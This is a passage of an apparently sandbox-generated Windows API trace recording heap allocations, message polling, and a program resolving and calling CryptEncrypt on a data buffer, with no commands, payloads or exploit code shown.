returned 0x2e54cc8 [0230.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0230.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0230.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0230.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0230.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0230.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0230.445] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0230.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0230.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0230.445] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0230.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0230.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0230.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0230.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0230.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0230.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0230.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0230.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0230.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd640) returned 0x2f14818 [0230.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0230.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d18 [0230.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0230.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0230.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0230.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f38 [0230.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0230.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0230.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0230.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55088 [0230.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0230.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0230.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0230.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cc8 [0230.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0230.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0230.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0230.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0230.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0230.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd640) returned 0x2f2f4a8 [0230.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0230.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0230.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0230.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0230.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0230.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0230.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0230.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0230.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0230.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0230.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0230.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0230.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0230.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0230.448] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.448] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.448] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.448] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.449] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.449] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.449] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0230.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0230.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0230.449] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0230.449] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0230.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042a0 | out: hHeap=0x970000) returned 1 [0230.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0230.449] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0230.449] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0230.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0230.449] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0230.450] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0230.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04070 | out: hHeap=0x970000) returned 1 [0230.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0230.450] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0230.450] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0230.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0230.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0230.450] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0230.450] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.450] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.450] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0230.450] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.450] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0230.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0230.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0230.450] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0230.451] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0230.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0230.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51370 [0230.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51370, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0230.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0230.452] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0230.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0230.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0230.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f4b8 [0230.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0230.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0230.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0230.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0230.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0230.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0230.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55308 [0230.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0230.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0230.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0230.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0230.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0230.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0230.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0230.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0230.452] CryptEncrypt (in: hKey=0xa87290, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xd640, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xd648) returned 1 [0230.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0230.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0230.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0230.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0230.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0230.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0230.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0230.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0230.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0230.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0230.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0230.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0230.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0230.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551d8 [0230.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0230.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551d8 | out: hHeap=0x970000) returned 1 [0230.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0230.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0230.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0230.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0230.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0230.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0230.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0230.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0230.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0230.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0230.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0230.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0230.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0230.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0230.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0230.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0230.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0230.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0230.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0230.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0230.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0230.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0230.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0230.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0230.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0230.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0230.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0230.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0230.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0230.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0230.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0230.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0230.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0230.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0230.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0230.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0230.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0230.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0230.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0230.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0230.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0230.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0230.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0230.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0230.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0230.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0230.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0230.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0230.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0230.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0230.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0230.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0230.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0230.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0230.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0230.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0230.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0230.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0230.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0230.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0230.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0230.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0230.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0230.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0230.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0230.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0230.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0230.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0230.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0230.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0230.456] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0230.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0230.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0230.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0230.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0230.456] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.456] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0230.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0230.456] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0230.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0230.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0230.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0230.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0230.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0230.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0230.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0230.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0230.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0230.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0230.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0230.457] CharLowerBuffW (in: lpsz="byte[54856]", cchLength=0xb | out: lpsz="byte[54856]") returned 0xb [0230.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0230.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0230.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0230.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0230.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0230.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0230.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0230.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 